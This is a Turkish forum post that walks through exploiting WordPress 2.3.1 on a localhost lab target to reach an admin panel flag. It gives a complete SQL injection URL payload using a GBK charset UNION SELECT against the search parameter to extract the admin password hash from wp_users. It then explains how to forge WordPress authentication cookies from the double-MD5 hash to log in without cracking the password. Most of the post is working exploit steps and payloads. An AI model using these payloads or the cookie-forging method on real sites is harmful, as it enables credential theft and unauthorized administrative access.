|
Webmaster Araçları Kutsal Webmaster Bilgi Kaynağı |
|
| Forum | Üye ol | Giriş Yap |
| Forum >> Güvenlik Açıkları ve ipuçları >> Wordpress 2.3.1i Güvenlik açığı |
| Yazan | |
| ahmet Yeni Üye  |  02 Eylül 2009 Çarşamba 13:40:30 sistem: wordpress sürüm: 2.3.1 güncel açık: SQL enjekte kodlarını sömürmek exploit: http://localhost/wordpress/index.php?exact=1&sentence=1&s=%b3%27)))/**/AND/**/ID=- 1/**/UNION/**/SELECT/**/1,2,3,4,5,user_pass,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24/**/FROM/**/wp_users%23 saldırı analizi ve hedefe saldırı: Hedefimiz http://localhost/wordpress/ adresinde kurulu olan bir WordPress portal uygulaması ve yönetim arayüzüne (wp-admin) giriş yapıp bayrağa ulaşmamız isteniyor. Öncelikle kurulu olan WordPress portal uygulamasının versiyonunu öğrenecek olursak; ana sayfaya ve ya yönetim arayüzüne giriş için kullanılan sayfanın HTML kaynak kodlarına baktığımızda; <meta name="generator" content="WordPress 2.3.1" />veya <link rel='stylesheet' href='http://localhost/wordpress/wp-admin/wp-admin.css?version=2.3.1' type='text/css' /> WordPress`in 2.3.1 versiyonunun kurulu olduğunu görürüz. WordPress 2.3.1 versiyonunda SQL Injection açıklığı bulunmaktadır [3]. (milw0rm exploit veritabanını zaman zaman bilgisayarınıza indirmeniz işinize yarayacaktır) İlgili exploiti incelediğimizde WordPress`in kullandığı karakter setinin (charset) 'GBK' olması durumunda 'index.php' sayfasının 's' parametresi üzerinden SQL sorguları çalıştırılabilmekte ve veritabanında ki verilere ulaşılabilmektedir http://localhost/wordpress/index.php?exact=1&sentence=1&s=%b3%27)))/**/AND/**/ID=- 1/**/UNION/**/SELECT/**/1,2,3,4,5,user_pass,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24/**/FROM/**/wp_users%23 Açıklığı exploit edip sorgumuzu çalıştırdıktan sonra admin kullanıcısının şifresinin MD5`li halinin döndürüldüğünü görürüz [4]. (e10adc3949ba59abbe56e057f20f883e) (Not: Ben burada şifreyi '123456' olarak belirlediğim için WordList Attack düzenleyerek kırmak çok zor olmayacaktır. Şifrenin Brute-Force Attack ile kolay kırılmaması için kompleks olarak belirlendiğini varsayarak devam ediyoruz) Peki elde ettiğimiz admin şifresinin MD5`li halini kıramadığımız için ne işimize yarayacak ? exploit ile alakalı verileri daha iyi analiz eder ve WordPress`in kullandığı cookie yapısını incelerseniz elde edilen MD5`li veriyi tekrardan MD5 ile şifreleyip kullanabileceğimizi görmüş oluruz [5]. Elde ettiğimiz hash`i (e10adc3949ba59abbe56e057f20f883e) tekrardan MD5 ile şifrelediğimizde ise (14e1b600b1fd579f47433b88e8d85291) hash`ine ulaşırız. İlgili cookie yapısını dikkate alarak elde ettiğimiz hashleri de kullanarak, Cookie Editor eklentisi sayesinde aşağıda oluşturulan iki cookie Firefox`a eklenir; wordpressuser_bbfa5b726c6b7a9cf3cda9370be3ee91=admin wordpresspass_bbfa5b726c6b7a9cf3cda9370be3ee91=14e1b600b1fd579f47433b88e8d85291 Not: Cookie yapısını incelediğimizde cookie isminin uygulamanın yayın yaptığı URL`in MD5 ile şifrelenmiş hali olduğunu görürüz. Yani yukarıda kullandığımız cookie ismi (bbfa5b726c6b7a9cf3cda9370be3ee91) uygulamamızın yayın yaptığı URL`in (http://localhost/wordpress) MD5`li halidir. Son olarak wp-admin klasörü browser`dan çağrılarak sisteme giriş yapılmış olduğunu görülür |
Hemen üye olmak için burayı tıklayınız.. | |
| Sayfalar: 1 | |